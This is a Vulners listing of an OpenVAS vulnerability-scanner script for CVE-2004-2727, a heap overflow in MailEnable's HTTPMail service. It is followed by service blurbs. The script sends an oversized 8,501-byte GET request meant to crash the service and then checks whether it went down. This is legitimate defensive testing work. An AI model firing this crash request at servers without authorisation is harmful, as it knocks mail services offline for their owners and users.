| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2004-2727 | 9 Oct 200710:00 | – | cve | |
| CVE-2004-2727 | 9 Oct 200710:00 | – | cvelist | |
| EUVD-2004-2717 | 7 Oct 202500:30 | – | euvd | |
| MailEnable Professional HTTPMail GET Request Remote Overflow | 3 Sep 200400:00 | – | nessus | |
| CVE-2004-2727 | 31 Dec 200405:00 | – | nvd | |
| MailEnable < 1.19 HTTPMail Service GET Overflow Vulnerability - Active Check | 3 Nov 200500:00 | – | openvas |
# OpenVAS Vulnerability Test
# $Id: mailenable_httpmail_get_overflow.nasl 5785 2017-03-30 09:19:35Z cfi $
# Description: MailEnable HTTPMail Service GET Overflow Vulnerability
#
# Authors:
# George A. Theall, <[email protected]>
#
# Copyright:
# Copyright (C) 2004 George A. Theall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
tag_summary = "The target is running at least one instance of MailEnable -
http://www.mailenable.com/ - that has a flaw in the HTTPMail service
(MEHTTPS.exe) in the Professional and Enterprise Editions. The flaw
can be exploited by issuing an HTTP request exceeding 4045 bytes (8500
if logging is disabled), which causes a heap buffer overflow, crashing
the HTTPMail service and possibly allowing for arbitrary code
execution.";
tag_solution = "Upgrade to MailEnable Professional / Enterprise 1.19 or
later.";
if (description)
{
script_id(14656);
script_version("$Revision: 5785 $");
script_tag(name:"last_modification", value:"$Date: 2017-03-30 11:19:35 +0200 (Thu, 30 Mar 2017) $");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:N/A:P");
script_cve_id("CVE-2004-2727");
script_bugtraq_id(10312);
script_xref(name:"OSVDB", value:"6037");
script_name("MailEnable HTTPMail Service GET Overflow Vulnerability");
script_category(ACT_DENIAL);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("This script is Copyright (C) 2004 George A. Theall");
script_family("Denial of Service");
script_require_ports("Services/www", 8080, 80 );
script_dependencies("global_settings.nasl", "gb_get_http_banner.nasl");
script_mandatory_keys("MailEnable/banner");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("global_settings.inc");
include("http_func.inc");
# nb: HTTPMail defaults to 8080 but can run on any port.
port = get_http_port(default:8080);
# Make sure banner's from MailEnable.
banner = get_http_banner(port:port);
if (debug_level) display("debug: banner =>>", banner, "<<.\n");
if (!egrep(pattern:"^Server: .*MailEnable", string:banner)) exit(0);
host = http_host_name( port:port );
# Try to bring it down.
soc = http_open_socket(port);
if (soc) {
req = string(
# assume logging is disabled.
"GET /", crap(length:8501, data:"X"), " HTTP/1.0\r\n",
"Host: ", host, "\r\n",
"\r\n"
);
if (debug_level) display("debug: sending =>>", req, "<<\n");
send(socket:soc, data:req);
res = http_recv(socket:soc);
http_close_socket(soc);
if (res) {
if (debug_level) display("debug: res =>>", res, "<<\n");
}
else {
soc = http_open_socket(port);
if (!soc)
security_message(port);
else
http_close_socket(soc);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation